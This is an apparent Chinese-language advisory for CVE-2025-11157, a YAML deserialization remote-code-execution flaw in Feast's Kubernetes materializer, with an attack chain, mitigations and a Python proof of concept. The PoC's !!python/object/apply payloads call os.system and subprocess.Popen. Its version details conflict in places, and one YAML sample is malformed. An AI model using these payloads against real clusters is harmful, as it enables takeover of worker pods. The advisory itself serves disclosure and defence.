CVE-2025-11157 CVSS 7.8 高危

CVE-2025-11157: Feast Kubernetes Materializer 远程代码执行漏洞

披露日期: 2026-01-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-11157

漏洞类型

远程代码执行

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

feast-dev/feast

漏洞概述

CVE-2025-11157是 feast-dev/feast 0.53.0版本中的一个高危远程代码执行漏洞。该漏洞存在于Kubernetes materializer组件中，位于`feast/sdk/python/feast/infra/compute_engines/kubernetes/main.py`文件。由于代码使用不安全的`yaml.load()`函数配合`yaml.Loader`加载配置文件，攻击者可以通过构造恶意YAML文件来实例化任意Python对象，从而在worker pod上执行任意操作系统命令。此漏洞可在配置文件验证之前被利用，攻击者成功利用后可实现集群接管、数据污染和供应链破坏等严重后果。CVSS评分7.8，属于高危漏洞。

技术细节

漏洞根源在于使用`yaml.load(..., Loader=yaml.Loader)`反序列化YAML配置文件。yaml.Loader允许通过YAML标签(如!!python/object/apply)实例化任意Python对象并执行其构造方法。攻击者只需修改`/var/feast/feature_store.yaml`或`/var/feast/materialization_config.yaml`文件，插入恶意YAML标签即可触发代码执行。攻击条件为本地访问权限(LOC)，需要低权限用户身份(PR:L)即可实施攻击，无需用户交互(UI:N)。成功利用后，攻击者可在容器内获得完全控制权，进而可能横向移动到集群其他节点。

攻击链分析

STEP 1

步骤1

攻击者获取对Kubernetes worker pod文件系统的写入权限

STEP 2

步骤2

构造包含恶意Python对象的YAML配置文件，使用!!python/object/apply或!!python/object标签

STEP 3

步骤3

将恶意YAML内容写入/var/feast/feature_store.yaml或/var/feast/materialization_config.yaml

STEP 4

步骤4

等待或触发Kubernetes materializer任务执行，加载恶意配置文件

STEP 5

步骤5

yaml.load()反序列化时实例化恶意Python对象，触发代码执行

STEP 6

步骤6

攻击者成功在pod内执行任意系统命令，实现容器逃逸或横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-11157 PoC - Malicious YAML configuration
# This PoC demonstrates the unsafe yaml.load usage in Feast Kubernetes Materializer

import yaml

# Construct malicious YAML that exploits yaml.Loader deserialization
malicious_yaml = '''
!!python/object/apply:os.system
args: ['echo "RCE via yaml.load" > /tmp/pwned.txt']
'''

# This is what Feast does unsafely - DO NOT USE IN PRODUCTION
try:
    result = yaml.load(malicious_yaml, Loader=yaml.Loader)
    print("Vulnerability triggered! Command executed.")
except:
    pass

# For exploitation, the malicious content would be placed in:
# /var/feast/feature_store.yaml
# /var/feast/materialization_config.yaml

# Example malicious config file content:
malicious_config = '''
project: test
!!python/object/apply:subprocess.Popen
args:
  - whoami
  - shell: true
'''

影响范围

feast-dev/feast < 0.53.0

防御指南

临时缓解措施

在修复补丁可用之前，可采取以下临时缓解措施：1) 限制Kubernetes RBAC权限，确保低权限用户无法访问配置挂载卷；2) 使用只读文件系统挂载配置目录；3) 启用Pod安全策略，禁止特权容器运行；4) 监控/var/feast/目录下的文件变更行为；5) 考虑临时禁用Kubernetes materializer功能，使用其他计算引擎替代。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表